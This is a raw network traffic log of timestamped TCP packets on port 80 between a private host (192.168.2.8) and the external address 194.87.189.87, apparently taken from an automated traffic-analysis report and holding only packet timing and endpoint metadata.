                                                                                                                                    Oct 6, 2024 21:28:16.544053078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544099092 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544142962 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544147968 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544187069 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544189930 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544218063 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544236898 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544244051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544256926 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544291019 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544300079 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544326067 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544346094 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544352055 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544373989 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544389009 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544399977 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544415951 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544436932 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544462919 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544462919 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544491053 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544504881 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544517994 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544538021 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544544935 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544563055 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544570923 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544595003 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544596910 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544611931 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544625044 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544645071 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544651031 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544670105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544677973 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544693947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544704914 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544718981 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544743061 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544753075 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544780016 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544800043 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544806957 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544817924 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544833899 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544859886 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544869900 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544887066 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544888020 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544903994 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544914961 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544925928 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544943094 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544959068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544969082 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.544981003 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.544995070 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545018911 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545021057 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545036077 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545048952 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545070887 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545074940 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545092106 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545101881 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545114040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545147896 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545150042 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545176983 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545197010 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545202971 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545227051 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545231104 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545243979 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545258045 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545274973 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545284986 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545300961 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545311928 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545325994 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545337915 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545361996 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545365095 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545380116 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545392990 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.545412064 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.545435905 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548059940 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548120022 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548135996 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548137903 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548145056 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548166037 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548211098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548317909 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548361063 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548614025 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548623085 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.548661947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.548683882 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549014091 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549022913 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549032927 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549063921 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549078941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549091101 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549099922 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549124002 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549133062 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549159050 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549180984 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549181938 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549228907 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.549262047 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.549300909 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.550656080 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550704002 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.550731897 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550740957 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550781965 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.550896883 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550940990 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.550947905 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550985098 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.550988913 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.550993919 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551011086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551032066 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551052094 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551054955 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551069021 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551089048 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551109076 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551184893 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551208019 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551217079 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551223040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551244974 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551261902 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551269054 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551296949 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.551311970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.551337957 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553292036 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553348064 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553383112 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553426027 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553487062 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553503036 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553512096 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553525925 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553549051 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553556919 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553606987 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553633928 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553642988 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553669930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553673029 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553682089 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553699017 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553721905 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553731918 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553740978 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553750992 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553783894 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553786039 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553802967 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553832054 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553843021 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553852081 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553859949 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553885937 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553913116 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553919077 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553929090 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553960085 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553965092 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.553968906 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.553983927 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554003954 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554006100 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554013968 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554023981 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554052114 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554086924 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554096937 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554105997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554114103 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554135084 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554143906 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554155111 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554155111 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554172039 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554209948 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554244995 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554254055 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554261923 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554270029 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554279089 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554280043 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554287910 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554301977 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554310083 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554336071 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554347038 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554356098 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554361105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554364920 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554380894 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554389000 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554408073 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554409027 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554419041 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554445982 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554446936 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554456949 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554464102 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554482937 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554487944 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554497004 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554503918 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554527044 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554536104 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554537058 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554544926 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554563046 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554580927 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554594040 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554601908 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554604053 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554611921 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554625034 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554646015 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554661036 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554671049 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554680109 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554687977 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554697990 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554706097 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554708958 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554716110 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554747105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554765940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554789066 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554797888 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554805994 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554814100 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.554841042 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.554866076 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555013895 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555022955 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555031061 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555038929 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555047035 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555054903 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555063963 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555072069 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555079937 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555080891 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555088043 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555097103 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555104971 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555109978 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555113077 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555121899 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555130959 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555134058 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555139065 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555154085 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555162907 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555166960 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555171013 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555180073 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555188894 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555196047 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555197001 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555206060 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555214882 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555222988 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555223942 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555233002 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555242062 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555249929 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555258036 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555269003 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555304050 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555349112 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555357933 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555366993 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555375099 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555389881 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555392027 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555429935 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555449009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.555563927 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555572987 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555581093 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.555588961 CEST8049748194.87.189.87192.168.2.8
